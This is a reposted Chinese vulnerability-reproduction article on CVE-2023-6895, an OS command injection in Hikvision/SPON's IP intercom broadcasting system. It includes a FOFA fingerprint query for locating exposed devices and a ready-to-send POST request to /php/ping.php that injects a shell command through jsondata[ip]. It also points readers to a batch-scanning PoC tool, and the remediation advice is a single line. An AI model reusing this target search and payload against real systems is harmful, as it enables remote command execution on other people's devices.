Hikvision SPON IP网络对讲广播系统存在命令执行漏洞CVE | 您所在的位置:网站首页 › spon对讲密码 › Hikvision SPON IP网络对讲广播系统存在命令执行漏洞CVE |
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 大家关注一下我的另外一个公众号,这个公众号也会发POC,两个公众号发的漏洞不一样,基本每天更新。新建一个小号主要是有两个目的:一是分摊风险,网络安全方面的公众号不知道什么时候就被封了,这个号已经有点危险了 ;二、漏洞实在太多了,一个号根本发不完。 1. Hikvision SPON IP网络对讲广播系统简介微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发 Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。 2.漏洞描述Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。 CVE编号:CVE-2023-6895 CNNVD编号:CNNVD-202312-1624 CNVD编号: 3.影响版本海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE Hikvision SPON IP网络对讲广播系统存在命令执行漏洞 4.fofa查询语句icon_hash="-1830859634" 5.漏洞复现漏洞链接:https://127.0.0.1/php/ping.php 漏洞数据包: POST /php/ping.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeHost: 127.0.0.1Content-Length: 40Content-Type: application/x-www-form-urlencodedjsondata[ip]=a|ipconfig&jsondata[type]=1 6.POC&EXP关注公众号 南风漏洞复现文库 并回复 漏洞复现95 即可获得该POC工具下载地址: 本期漏洞及往期漏洞的批量扫描POC及POC工具箱已经上传知识星球:南风网络安全 7.整改意见请到官网下载补丁:https://www.spon.com.cn/ 原文始发于微信公众号(南风漏洞复现文库):Hikvision SPON IP网络对讲广播系统存在命令执行漏洞CVE-2023-6895 附POC软件 |
CopyRight 2018-2019 实验室设备网 版权所有 |